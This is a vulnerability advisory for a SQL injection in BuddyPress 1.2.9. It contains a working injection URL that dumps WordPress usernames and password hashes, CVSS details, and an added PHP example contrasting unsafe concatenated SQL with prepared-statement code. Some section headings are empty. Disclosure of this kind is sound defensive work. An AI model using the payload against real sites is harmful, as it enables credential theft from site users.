Advisory: SQL injections in BuddyPress 1.2.9

Vulnerability

A SQL injection exists in BuddyPress 1.2.9 allowing arbitrary queries to be run on the database by a non-privileged user.

This vulnerability arises from BuddyPress's use of SQL queries that are built by appending strings together, without properly preparing the input variables.

A simple query that can be run is:

http://buddypress.local/groups/test-group/activity/-9)union(select(1),(2),(3),(4),(5),concat(user_login,0x3a,user_pass),(7),(8),(9),(10),(11),(12),(13)from(wp_users)

The query string is mapped to a parameter named $activity_ids which is appended, unprepared, to a statement in buddypress/bp-activity/bp-activity-classes.php at line 192.
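To make the root cause concrete, here is an added illustration written for this advisory rather than taken from BuddyPress: the unsafe concatenation pattern described above, placed beside a hardened version that validates the ID list and binds every value through $wpdb->prepare(). The function names, the tiny wpdb stub (which implements only the %d placeholder so the file runs outside WordPress), and the bp_activity table name are assumptions for the demonstration.

```php
<?php
// Added example, not BuddyPress code. Shows the unsafe pattern the advisory
// describes and a hardened replacement that uses prepared placeholders.

// Minimal stand-in for WordPress's $wpdb so this runs without WordPress.
// Only the %d placeholder is implemented; the real prepare() does more.
class wpdb_stub {
    public $prefix = 'wp_';
    public $last_query = '';
    public function prepare($query, ...$args) {
        return vsprintf($query, array_map('intval', $args));
    }
    public function get_results($sql) {
        $this->last_query = $sql;   // record what would have been executed
        return [];
    }
}

// UNSAFE (assumed shape of the flawed code): the caller-supplied ID list is
// concatenated straight into the statement, so any text reaches the database.
function get_activity_unsafe(wpdb_stub $wpdb, $activity_ids) {
    $sql = "SELECT * FROM {$wpdb->prefix}bp_activity WHERE id IN ({$activity_ids})";
    return $wpdb->get_results($sql);
}

// HARDENED: split the list, reject anything that is not a positive integer,
// then bind each value with a %d placeholder so the list cannot alter the query.
function get_activity_safe(wpdb_stub $wpdb, $activity_ids) {
    $parts = array_map('trim', explode(',', (string) $activity_ids));
    $ids = [];
    foreach ($parts as $part) {
        if ($part === '' || !ctype_digit($part) || (int) $part < 1) {
            return [];          // invalid input: run nothing, let the caller report it
        }
        $ids[] = (int) $part;
    }
    $placeholders = implode(',', array_fill(0, count($ids), '%d'));
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}bp_activity WHERE id IN ({$placeholders})",
        ...$ids
    );
    return $wpdb->get_results($sql);
}

// Constructed inputs: a well-formed list and a malformed one.
$wpdb = new wpdb_stub();
foreach (['12,34', '12,abc) OR 1=1 -- '] as $input) {
    get_activity_unsafe($wpdb, $input);
    echo "unsafe : {$wpdb->last_query}\n";
    $wpdb->last_query = '(rejected, no query run)';
    get_activity_safe($wpdb, $input);
    echo "safe   : {$wpdb->last_query}\n\n";
}
```

Run with php on the command line: for the well-formed list both functions issue the same query, while for the malformed list the unsafe version passes the text through verbatim and the safe version refuses to build a statement at all. The design point is that allow-listing the shape of the input (digits only) and binding through placeholders are complementary; either alone closes this particular hole, and together they also catch the accidental case where a caller passes something that is not an ID list.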

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability:

Score: 8.5 (High)
Access vector: Network
Access complexity: Low
Authentication: None
Confidentiality impact: Partial
Integrity impact: None
Availability impact: Complete
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Advisory timeline

Mitigation/further actions

This issue was reported to the vendor and is reported fixed in BuddyPress 1.2.10.